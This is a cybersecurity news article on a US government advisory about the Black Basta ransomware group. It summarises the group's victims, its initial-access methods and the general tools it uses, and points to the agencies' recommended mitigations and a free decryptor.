The Black Basta ransomware group has hit more than 500 organizations globally, including critical infrastructure entities in North America, Europe, and Australia, the US government warns.
First identified in April 2022, Black Basta has been operating under the ransomware-as-a-service (RaaS) business model, where affiliates conduct cyberattacks, deploy malware against victim organizations, and collect a percentage of the ransom payment.
In a November 2023 report, blockchain analytics firm Elliptic estimated that Black Basta affiliates had received over $100 million in ransom payments from at least 90 victim organizations.
According to a new alert from CISA, the FBI, the Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC), Black Basta affiliates have conducted attacks against 12 out of 16 critical infrastructure sectors, including healthcare organizations.
For initial access, the cybercriminals rely on phishing and the exploitation of known vulnerabilities, such as CVE-2024-1709, a critical ConnectWise ScreenConnect flaw that started being exploited only days after it was publicly disclosed on February 19.
After compromising a victim’s network, the attackers deploy various tools for remote access, network scanning, lateral movement, privilege escalation, and data exfiltration, including SoftPerfect, BITSAdmin, PsExec, Mimikatz, and RClone.
The Black Basta affiliates were also observed exploiting vulnerabilities such as ZeroLogon, NoPac, and PrintNightmare for privilege escalation, abusing Remote Desktop Protocol (RDP) for lateral movement, and deploying the Backstab tool to disable endpoint detection and response (EDR) solutions.
After exfiltrating the victim’s data, the attackers delete volume shadow copies to hinder recovery, deploy ransomware to encrypt the compromised systems, and drop a ransom note.
The new alert from CISA, FBI, HHS, and MS-ISAC provides details on the tactics, techniques, and procedures (TTPs) employed by Black Basta affiliates, indicators of compromise (IoCs), and recommended mitigations.
“Healthcare organizations are attractive targets for cybercrime actors due to their size, technological dependence, access to personal health information, and unique impacts from patient care disruptions. The authoring organizations urge the HPH sector and all critical infrastructure organizations to apply the recommendations in the mitigations section to reduce the likelihood of compromise from Black Basta and other ransomware attacks,” the four government agencies note.
In January 2024, hacking research collective and consulting think tank SRLabs released a free decryptor to help Black Basta victims recover their data without paying a ransom.
Related: Free Decryptor Released for Black Basta Ransomware
Related: Black Basta Ransomware Linked to FIN7 Cybercrime Group
Related: New Black Basta Ransomware Possibly Linked to Conti Group
